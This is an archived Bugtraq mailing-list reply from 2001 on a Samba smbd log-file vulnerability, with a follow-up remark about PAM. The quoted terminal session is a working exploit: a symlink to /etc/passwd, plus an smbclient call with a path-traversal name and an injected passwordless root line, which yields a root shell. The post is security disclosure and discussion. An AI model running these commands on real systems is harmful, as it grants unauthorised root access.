Home page logo

bugtraq logo Bugtraq mailing list archives

Re: smbd remote file creation vulnerability
From: Joachim Blaabjerg <styx () mailbox as>
Date: Tue, 26 Jun 2001 11:08:04 +0200

Pavol Luptak <wilder () hq alert sk> wrote:

[wilder () lysurus wilder]$ cat /etc/redhat-release 
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder () lysurus wilder]$ rpm -q pam
[wilder () lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log    (= changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder () lysurus wilder]$ rpm -qf /usr/sbin/smbd
[wilder () lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder () lysurus wilder]$ smbclient //localhost/"`perl -e '{print
"\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip= bcast= nmask=
Anonymous login successful
Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
[wilder () lysurus wilder]$ tail /etc/passwd
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
  Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
  ../../../tmp/x ( couldn't find service 
[wilder () lysurus wilder]$ su toor
[root () lysurus wilder]#

Appending to /etc/passwd has nothing to do with pam.

No, not directly, but if your `su` uses PAM to authenticate users and PAM
reacts to the spaces in the beginning of the passwd file, it surely has
something to do with PAM. To check whether `su` uses PAM or not, try "ldd
`which su`|grep libpam"


Joachim Blaabjerg
styx () mailbox as 

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]